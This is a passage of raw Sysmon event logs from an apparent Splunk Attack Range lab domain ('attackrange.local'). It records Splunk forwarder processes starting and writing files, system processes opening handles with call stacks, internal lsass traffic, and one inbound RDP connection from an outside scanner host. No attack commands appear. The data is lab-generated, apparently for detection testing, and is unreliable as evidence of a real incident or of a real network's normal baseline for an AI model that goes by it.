Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FB2E255D74A76241598EAF3067116344,SHA256=03620E4F0E7B6ED300D5E9B7C13EC74A2EB5F354492B5531AF9C1B17406449A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806380Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:49.349{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B6DFE2A6D6CBE03F3ECB7FFD7408FD9D,SHA256=32F3437E6DA661EF3BB7B3BD5C58F2784084AE95673B585C807C5139C16FE953,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806379Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:49.302{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98040088159668A179D3F03219820C03,SHA256=31B3B3146A2A1ACECEF231CCB2522A1603B0BC9BBF337F72B8AAB2FD081F4573,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046570Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.978{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAEB9CCF1F4ECE2158FDA3663C02B3DB,SHA256=12738B05FA934B819AAB5CF0AA27C2673BC6672B66D871D4EDA2E1AB3A48CC5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806384Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:50.334{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E3AB3C041E005FD9B38623AE67783D5,SHA256=C99C14F5FA4928946D6A9A47992942173CB8DD6043B663ABAFAF1E47687BFACB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046569Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.879{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F32E-60EB-F87C-00000000CF01}9000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046568Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.879{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046567Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:50.879{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046566Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.879{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046565Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:50.879{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046564Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.879{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F32E-60EB-F87C-00000000CF01}9000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046563Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.863{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F32E-60EB-F87C-00000000CF01}9000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046562Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.864{466BC892-F32E-60EB-F87C-00000000CF01}9000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001046561Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:41.900{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57176-false10.0.1.14win-dc-890.attackrange.local49676- 10341000x80000000000000001046560Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.195{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F32E-60EB-F77C-00000000CF01}9784C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046559Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.195{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046558Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:50.195{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046557Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.195{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046556Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:50.195{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046555Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.195{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F32E-60EB-F77C-00000000CF01}9784C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046554Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.195{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F32E-60EB-F77C-00000000CF01}9784C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046553Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.180{466BC892-F32E-60EB-F77C-00000000CF01}9784C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000806383Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:48.498{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57176-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 354300x8000000000000000806382Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:48.224{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 
SERVICEtcpfalsefalse89.248.165.74recyber.net44691-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x80000000000000001046583Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:51.979{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AE8B17DDBE9E91D7DFC2A57A572C25A,SHA256=BF9B4E6D7B81CA9FF3DF8C0676BAE1DB11E9E528EBBCFAA2D109202032BED696,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806385Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:51.349{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=795BA32E063DFA02BF03C4A176274AA8,SHA256=9594C9D355C120A066DD2685509CC412C7444EEAF1FDA543633A3689A00CB336,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046582Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:51.663{466BC892-F32F-60EB-F97C-00000000CF01}47129552C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001046581Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:51.479{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F32F-60EB-F97C-00000000CF01}4712C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046580Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:51.479{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046579Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:51.479{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046578Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:51.463{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046577Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:51.463{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046576Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:51.463{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F32F-60EB-F97C-00000000CF01}4712C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046575Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:51.463{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F32F-60EB-F97C-00000000CF01}4712C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
